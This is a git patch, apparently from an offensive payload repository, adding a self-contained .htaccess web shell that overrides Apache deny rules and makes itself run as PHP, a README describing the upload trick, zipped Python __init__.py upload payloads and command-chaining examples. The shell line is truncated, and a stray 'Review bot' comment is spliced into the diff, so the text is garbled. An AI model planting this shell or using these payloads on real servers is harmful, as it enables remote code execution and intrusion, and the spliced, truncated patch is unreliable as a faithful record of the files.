From a2d5fe5cad9ca50614d588924431fbe7d1a6ef5b Mon Sep 17 00:00:00 2001 
From: Swissky
Date: Mon, 9 Oct 2017 23:17:31 +0200
Subject: [PATCH] Upload .htaccess to PHP code exec
---
Remote commands execution/README.md | 1 +
Upload insecure files/PHP .htaccess/.htaccess | 14 +++++++++
Upload insecure files/PHP .htaccess/README.md | 27 ++++++++++++++++++
.../python-admin-__init__.py.zip | Bin 0 -> 178 bytes
.../python-conf-__init__.py.zip | Bin 0 -> 176 bytes
.../python-config-__init__.py.zip | Bin 0 -> 180 bytes
.../python-controllers-__init__.py.zip | Bin 0 -> 190 bytes
.../python-generate-init.py | 19 ++++++++++++
.../python-login-__init__.py.zip | Bin 0 -> 178 bytes
.../python-models-__init__.py.zip | Bin 0 -> 180 bytes
.../python-modules-__init__.py.zip | Bin 0 -> 182 bytes
.../python-scripts-__init__.py.zip | Bin 0 -> 182 bytes
.../python-settings-__init__.py.zip | Bin 0 -> 184 bytes
.../python-tests-__init__.py.zip | Bin 0 -> 178 bytes
.../python-urls-__init__.py.zip | Bin 0 -> 176 bytes
.../python-utils-__init__.py.zip | Bin 0 -> 178 bytes
.../python-view-__init__.py.zip | Bin 0 -> 176 bytes
17 files changed, 61 insertions(+)
create mode 100644 Upload insecure files/PHP .htaccess/.htaccess
create mode 100644 Upload insecure files/PHP .htaccess/README.md
create mode 100644 Upload insecure files/Python __init__.py/python-admin-__init__.py.zip
create mode 100644 Upload insecure files/Python __init__.py/python-conf-__init__.py.zip
create mode 100644 Upload insecure files/Python __init__.py/python-config-__init__.py.zip
create mode 100644 Upload insecure files/Python __init__.py/python-controllers-__init__.py.zip
create mode 100644 Upload insecure files/Python __init__.py/python-generate-init.py
create mode 100644 Upload insecure files/Python __init__.py/python-login-__init__.py.zip
create mode 100644 Upload insecure files/Python __init__.py/python-models-__init__.py.zip
create mode 100644 Upload insecure files/Python __init__.py/python-modules-__init__.py.zip
create mode 100644 Upload insecure files/Python 
__init__.py/python-scripts-__init__.py.zip
create mode 100644 Upload insecure files/Python __init__.py/python-settings-__init__.py.zip
create mode 100644 Upload insecure files/Python __init__.py/python-tests-__init__.py.zip
create mode 100644 Upload insecure files/Python __init__.py/python-urls-__init__.py.zip
create mode 100644 Upload insecure files/Python __init__.py/python-utils-__init__.py.zip
create mode 100644 Upload insecure files/Python __init__.py/python-view-__init__.py.zip
diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md
index 8a68054..3ffd7b1 100644
--- a/Remote commands execution/README.md
+++ b/Remote commands execution/README.md
@@ -17,6 +17,7 @@ Commands execution by chaining commands original_cmd_by_server; ls original_cmd_by_server && ls original_cmd_by_server | ls +original_cmd_by_server || ls Only if the first cmd fail ``` Commands execution inside a command
diff --git a/Upload insecure files/PHP .htaccess/.htaccess b/Upload insecure files/PHP .htaccess/.htaccess
new file mode 100644
index 0000000..9abc36b
--- /dev/null
+++ b/Upload insecure files/PHP .htaccess/.htaccess
@@ -0,0 +1,14 @@
+# Self contained .htaccess web shell - Part of the htshell project
+# Written by Wireghoul - http://www.justanotherhacker.com
+
+# Override default deny rule to make .htaccess file accessible over web
+
+Order allow,deny
+Allow from all
+
+
+# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
+# the apache directoves from the .htaccess file
+AddType application/x-httpd-php .htaccess
+
+###### SHELL ###### &1"); ?>###### LLEHS ######
diff --git a/Upload insecure files/PHP .htaccess/README.md b/Upload insecure files/PHP .htaccess/README.md
new file mode 100644
index 0000000..719aff3
--- /dev/null
+++ b/Upload insecure files/PHP .htaccess/README.md
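Review bot: The new `.htaccess` sample does not say which server configuration it depends on, so a reader cannot tell from the file how the technique is blocked. Both the `Order allow,deny` / `Allow from all` lines and the `AddType application/x-httpd-php .htaccess` line are per-directory overrides, which Apache honours only where `AllowOverride` grants the Limit and FileInfo classes for that directory. I would add a header comment such as `# Ignored when the upload directory is served with AllowOverride None (the server-side fix)`, and the accompanying README could say the same alongside rejecting dot-file names at upload time. The comment above the `AddType` line also has a typo, "directoves".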
@@ -0,0 +1,27 @@
+# .htaccess upload
+Uploading an .htaccess file to override Apache rule and execute PHP.
+"Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerabler server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded."
+
+
+Self contained .htaccess web shell
+```
+# Self contained .htaccess web shell - Part of the htshell project
+# Written by Wireghoul - http://www.justanotherhacker.com
+
+# Override default deny rule to make .htaccess file accessible over web
+
+Order allow,deny
+Allow from all
+
+
+# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
+# the apache directoves from the .htaccess file
+AddType application/x-httpd-php .htaccess
+
+###### SHELL ###### &1"); ?>###### LLEHS ######
+```
+
+
+## Thanks to
+* [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen ](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
+* [](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
diff --git a/Upload insecure files/Python __init__.py/python-admin-__init__.py.zip b/Upload insecure files/Python __init__.py/python-admin-__init__.py.zip
new file mode 100644
index 0000000000000000000000000000000000000000..69f89c52165beca1df9a6b52b2256214db45c4f8
GIT binary patch literal 178 zcmWIWW@Zs#fB;2?hfB)UHGmut28rtF=_jV-X6EU~$7kkcmc+;F6;x*C7UUO|DC8Gg z7ZhdYl_;nOXQbxjs9Wb3>lIfPm!#%usOJ=`Ygz|*Gct)V<2D;&Cj-NOMi2{|O#$Al QY#=#CAanxKQ6LTj03YflJOBUy literal 0 HcmV?d00001 
diff --git a/Upload insecure files/Python __init__.py/python-conf-__init__.py.zip b/Upload insecure files/Python __init__.py/python-conf-__init__.py.zip new file mode 100644 index 0000000000000000000000000000000000000000..4eef395abb72d006d681b859d4afae2eb14f5d19 GIT binary patch literal 176 zcmWIWW@Zs#fB;2?hfB)UHGmut76xKHJ^keTyfppz_{_Y_lK6PNg38R?g8ZTqh5Tac zf}+g45(V|(jMSVQb?f|Mz2eH^lGI!c^_*gLP3r(}MkWzv+(tvJWMKHu2x4KeD8QSQ Q4J5?~gpNQu62xHu0JiQVasU7T literal 0 HcmV?d00001 diff --git a/Upload insecure files/Python __init__.py/python-config-__init__.py.zip b/Upload insecure files/Python __init__.py/python-config-__init__.py.zip new file mode 100644 index 0000000000000000000000000000000000000000..61e0f11db4ea7d04978bf5511d94cd9b81ac93a3 GIT binary patch literal 180 zcmWIWW@Zs#fB;2?hfB)UHGmut76oEGJ^keTytK@8{rLFIyv&mLc)fzk%-n+fq7sGt zV(WsU%)Al>_27)uoE&xQ{9?W0%HopLTn+V{Vs%aH0B=Sn5oX+mLo8)r_|FJpVYMp2 So0SbD$q0nbKsp-4VE_P;|0Ws$ literal 0 HcmV?d00001 diff --git a/Upload insecure files/Python __init__.py/python-controllers-__init__.py.zip b/Upload insecure files/Python __init__.py/python-controllers-__init__.py.zip new file mode 100644 index 0000000000000000000000000000000000000000..7e7f015888cf3385e9c64be7f5584a00b2d549d4 GIT binary patch literal 190 zcmWIWW@Zs#fB;2?hfB)UHGmutmI7iuJ^keTypp2)oSf96V*U8|%)HE!_;|g7%FNt? z{Gt+t{9@~ZqRhM!1@+*J)SMi3>-=K9;>zNZ)LaeqoMLrN>i};?CJ|=bHb87F4C9XXfe0$7kkcmc+;F6;x*C7UUO|DC8Gg z7ZhdYl_;nOXQbxjs9Wb3>lIfPm!#%usOJ=`Ygz|*Gct)V<2D;&Cj-NOMi2{|O#$Al QY#=#CAanxKQ6LTj04r=ITmS$7 literal 0 HcmV?d00001 
diff --git a/Upload insecure files/Python __init__.py/python-models-__init__.py.zip b/Upload insecure files/Python __init__.py/python-models-__init__.py.zip new file mode 100644 index 0000000000000000000000000000000000000000..75c2e0f63ce5345966252fbc28f1f1713fb7dd96 GIT binary patch literal 180 zcmWIWW@Zs#fB;2?hfB)UHGmut76oEGJ^kGLl+>JJ{rLFIyv&mLc)fzk%-n+fq7sGt zV(WsU%)Al>_27)uoE&xQ{9?W0%HopLTn+V{Vs%aH0B=Sn5oX+mLo8)r_|FJpVYMp2 So0SbD$q0nbKsp-4VE_P|*CsXq literal 0 HcmV?d00001 diff --git a/Upload insecure files/Python __init__.py/python-modules-__init__.py.zip b/Upload insecure files/Python __init__.py/python-modules-__init__.py.zip new file mode 100644 index 0000000000000000000000000000000000000000..47e5e5e8ce43b56753f811bccb07ec10ad7b0d2c GIT binary patch literal 182 zcmWIWW@Zs#fB;2?hfB)UHGmut76W2EJ^kGLl+v8kV*U8|%)HE!_;|g7%FNt?{Gt+t z{9@~ZqRhM!1@+*J)SMi3>-=K9;>zNZ)LaeqoMLrN>i};?CJ|=brbBFHVEE4nVqv!{ Tz?+o~B+CedE-=K9;>zNZ)LaeqoMLrN>i};?CJ|=brbBFHVEE4nVqv!{ Tz?+o~B+CedE7ytkO literal 0 HcmV?d00001 diff --git a/Upload insecure files/Python __init__.py/python-tests-__init__.py.zip b/Upload insecure files/Python __init__.py/python-tests-__init__.py.zip new file mode 100644 index 0000000000000000000000000000000000000000..ebca36969e191e2eeeac8951c726056c8df54d47 GIT binary patch literal 178 zcmWIWW@Zs#fB;2?hfB)UHGmut28rtF>6fGymlW&A$7kkcmc+;F6;x*C7UUO|DC8Gg z7ZhdYl_;nOXQbxjs9Wb3>lIfPm!#%usOJ=`Ygz|*Gct)V<2D;&Cj-NOMi2{|O#$Al QY#=#CAanxKQ6LTj06mr^kN^Mx literal 0 HcmV?d00001 diff --git a/Upload insecure files/Python __init__.py/python-urls-__init__.py.zip b/Upload insecure files/Python __init__.py/python-urls-__init__.py.zip new file mode 100644 index 0000000000000000000000000000000000000000..13b89edfba49e95397996d4a14601aef9ea7a68f GIT binary patch literal 176 zcmWIWW@Zs#fB;2?hfB)UHGmut76xKHJ^j+6oMQd>_{_Y_lK6PNg38R?g8ZTqh5Tac zf}+g45(V|(jMSVQb?f|Mz2eH^lGI!c^_*gLP3r(}MkWzv+(tvJWMKHu2x4KeD8QSQ Q4J5?~gpNQu62xHu0L?-qvH$=8 literal 0 HcmV?d00001 
diff --git a/Upload insecure files/Python __init__.py/python-utils-__init__.py.zip b/Upload insecure files/Python __init__.py/python-utils-__init__.py.zip new file mode 100644 index 0000000000000000000000000000000000000000..3622020e876f48c5fb42d80bde67f904bfcf8a62 GIT binary patch literal 178 zcmWIWW@Zs#fB;2?hfB)UHGmut28rtF>6eyd<`nD4$7kkcmc+;F6;x*C7UUO|DC8Gg z7ZhdYl_;nOXQbxjs9Wb3>lIfPm!#%usOJ=`Ygz|*Gct)V<2D;&Cj-NOMi2{|O#$Al QY#=#CAanxKQ6LTj06btNi~s-t literal 0 HcmV?d00001 diff --git a/Upload insecure files/Python __init__.py/python-view-__init__.py.zip b/Upload insecure files/Python __init__.py/python-view-__init__.py.zip new file mode 100644 index 0000000000000000000000000000000000000000..29ed3a0ea0b8b67e8b34ef4ce67883bbc1a9dde9 GIT binary patch literal 176 zcmWIWW@Zs#fB;2?hfB)UHGmut76xKHJ^ixG)N=j!_{_Y_lK6PNg38R?g8ZTqh5Tac zf}+g45(V|(jMSVQb?f|Mz2eH^lGI!c^_*gLP3r(}MkWzv+(tvJWMKHu2x4KeD8QSQ Q4J5?~gpNQu62xHu0L76coB#j- literal 0 HcmV?d00001